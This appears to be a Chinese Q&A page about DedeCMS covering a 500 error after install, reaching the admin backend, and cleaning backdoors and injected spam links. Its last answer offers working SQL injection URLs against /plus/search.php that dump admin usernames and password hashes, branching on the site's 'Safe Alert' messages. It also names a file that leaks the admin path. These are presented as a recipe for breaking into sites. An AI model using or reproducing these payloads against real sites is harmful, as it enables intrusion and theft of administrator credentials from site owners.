本文目录一览:
- 1、dedecms 安装后 登录后台 报500 服务器错误
- 2、怎么进入dedecms的后台
- 3、织梦dedecms后台管理账号和密码被篡改,请问如何找到这个漏洞
- 4、怎样解决织梦DEDECMS网站后台被挂黑链
- 5、dedecms 的后台怎么爆啊,能告诉我详细一点吗
dedecms 安装后 登录后台 报500 服务器错误
楼主你好
能一直提示安装直至安装成功,应该环境是没问题,出现500可能是什么地方配置的问题,在根目录再新建一个目录看能不能访问,如果能说明dedecms的系统问题。
还有一种情况可能是你把配置错误的
.htaccess
文件放在网站目录里了,检查下看有没有。
希望可以帮到你。
林羽凡
怎么进入dedecms的后台
1、首先进入dedecms的源码目录,在源码目录中点击进入dede的文件夹,该文件夹就是dede的后台文件:
/iknow-pic.cdn.bcebos.com/e61190ef76c6a7ef074b28b9f3faaf51f2de66c4"target="_blank"title="点击查看大图"class="ikqb_img_alink"/iknow-pic.cdn.bcebos.com/e61190ef76c6a7ef074b28b9f3faaf51f2de66c4?x-bce-process=image%2Fresize%2Cm_lfit%2Cw_600%2Ch_800%2Climit_1%2Fquality%2Cq_85%2Fformat%2Cf_auto"esrc=""/
2、然后打开浏览器,输入“虚拟域名/dede”,没有配置虚拟域名就是“localhost/dede”回车进入后台的登录界面:
/iknow-pic.cdn.bcebos.com/b3b7d0a20cf431ad5b6ca2a64536acaf2fdd98f7"target="_blank"title="点击查看大图"class="ikqb_img_alink"/iknow-pic.cdn.bcebos.com/b3b7d0a20cf431ad5b6ca2a64536acaf2fdd98f7?x-bce-process=image%2Fresize%2Cm_lfit%2Cw_600%2Ch_800%2Climit_1%2Fquality%2Cq_85%2Fformat%2Cf_auto"esrc=""/
3、进入后台登录后,输入账号和密码,点击登录即可:
/iknow-pic.cdn.bcebos.com/08f790529822720e5681006575cb0a46f31fabe6"target="_blank"title="点击查看大图"class="ikqb_img_alink"/iknow-pic.cdn.bcebos.com/08f790529822720e5681006575cb0a46f31fabe6?x-bce-process=image%2Fresize%2Cm_lfit%2Cw_600%2Ch_800%2Climit_1%2Fquality%2Cq_85%2Fformat%2Cf_auto"esrc=""/
4、此时即可访问到dede的后台了:
/iknow-pic.cdn.bcebos.com/7dd98d1001e93901b6426fa175ec54e737d196e9"target="_blank"title="点击查看大图"class="ikqb_img_alink"/iknow-pic.cdn.bcebos.com/7dd98d1001e93901b6426fa175ec54e737d196e9?x-bce-process=image%2Fresize%2Cm_lfit%2Cw_600%2Ch_800%2Climit_1%2Fquality%2Cq_85%2Fformat%2Cf_auto"esrc=""/
怎样解决织梦DEDECMS网站后台被挂黑链
从你发布的图片可以看出,你网站已经被人种下的后门程序
1.先将templets 模板文件下载到本地,用批量替换工具将挂的黑链替换,并检查templets 模板有没有后门程序,如:.php 为后缀结尾的,你都分析下,里面很有可能隐藏后门程序。
2.对uploadfile 程序进行备份,下载到本地,检查有没有.php 为后缀结尾的 并分析
3.对数据库进行备份,并将备份下载到本地
4.对整个程序进行备份,并下载到本地
5.删除服务器上的整个网站,在dede官方,下载一个与你程序一致的版本,上传到服务器,并重新安装
6.将 检查后的 :数据库,和 uploadfile 和 templets 上传覆盖 服务器
完成以上步骤后 挂的连接 已经被清楚,包括后面程序也被清理。
dedecms 的后台怎么爆啊,能告诉我详细一点吗
如果你想找DEDECMS后台路径的话
访问/data/mysql_error_trace.inc 这个文件里有,如果幸运的话 你会看到的。
如果是爆管理账号密码,那么你可以试试以下方式。
/plus/search.php?keyword=11typeArr[`@'`and(SELECT%201%20FROM(select%20count(*),concat(floor(rand(0)*2),(SELECT/*'*/concat(0x5f,userid,0x5f,pwd,0x5f)%20from%20`%23@__admin`%20Limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)]=1
/plus/search.php?keyword=astypeArr%5B111%3D@%60%5C'%60)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+%5D=a
Safe Alert: Request Error step 2 !
那么直接用下面的exp
/plus/search.php?keyword=astypeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
看结果如果提示
Safe Alert: Request Error step 1 !
那么直接用下面的exp
/plus/search.php?keyword=astypeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a